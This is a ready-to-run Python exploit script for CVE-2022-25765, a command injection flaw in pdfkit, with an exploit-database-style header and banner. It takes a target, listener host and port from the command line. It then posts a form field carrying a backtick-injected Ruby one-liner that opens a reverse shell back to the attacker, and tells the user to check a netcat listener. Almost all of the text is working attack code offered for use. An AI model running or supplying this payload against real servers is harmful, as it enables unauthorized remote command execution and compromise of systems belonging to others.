#!/bin/env python3 # Exploit Title: pdfkit 0.0.0-0.8.7.2 - Command Injection # Exploit Author: lowercasenumbers # Vendor Homepage: https://pdfkit.org/ # Software Link: https://github.com/pdfkit/pdfkit # Version: 0.0.0-0.8.7.2 # Tested on: pdfkit 0.8.6 # CVE: CVE-2022–25765 # Exmaple usage: python cve-2022-25765.py -t http://10.40.11.43:80 -l 10.10.14.12 -p 4444 import argparse import requests from urllib.parse import quote def banner(): print(""" ################################################################################################ # ______ _______ ____ ___ ____ ____ ____ ____ _____ __ ____ # # / ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ \| ___|___ / /_| ___| _ __ _ _ # # | | \ \ / /| _| _____ __) | | | |__) | __) |____ __) |___ \ / / '_ \___ \ | '_ \| | | | # # | |___ \ V / | |__|_____/ __/| |_| / __/ / __/_____/ __/ ___) |/ /| (_) |__) || |_) | |_| | # # \____| \_/ |_____| |_____|\___/_____|_____| |_____|____//_/ \___/____(_) .__/ \__, | # # |_| |___/ # # # # Exploit Title: pdfkit < 0.8.7.2 - Command Injection # # Exploit Author: lowercasenumbers # # Vendor Homepage: https://pdfkit.org/ # # Software Link: https://github.com/pdfkit/pdfkit # # Version: < 0.8.7.2 # # Tested on: pdfkit 0.8.6 # # CVE: CVE-2022–25765 # # # ################################################################################################ """) def main(): banner() parser = argparse.ArgumentParser() parser.add_argument( '-t', '--target', required=True, type=str, help='remote target') parser.add_argument( '-l', '--lhost', required=True, type=str, help='Local Host IP') parser.add_argument( '-p', '--lport', required=True, type=str, help='Local Host port') args = parser.parse_args() url = f"{args.target}/" headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Content-Type": "application/x-www-form-urlencoded", "Origin": f"{args.target}", "Connection": "close", "Referer": f"{args.target}", "Upgrade-Insecure-Requests": "1" } data = { "url": f"http://{args.lhost}:{args.lport}/?name=%20` ruby -rsocket -e'spawn(\"sh\",[:in,:out,:err]=>TCPSocket.new(\"{args.lhost}\",{args.lport}))'`'" } print("> Sending Reverse Shell") requests.post(url, headers=headers, data=data) print("> Exploit Completed") print(f"> Check your netcat listener") if __name__ == "__main__": main()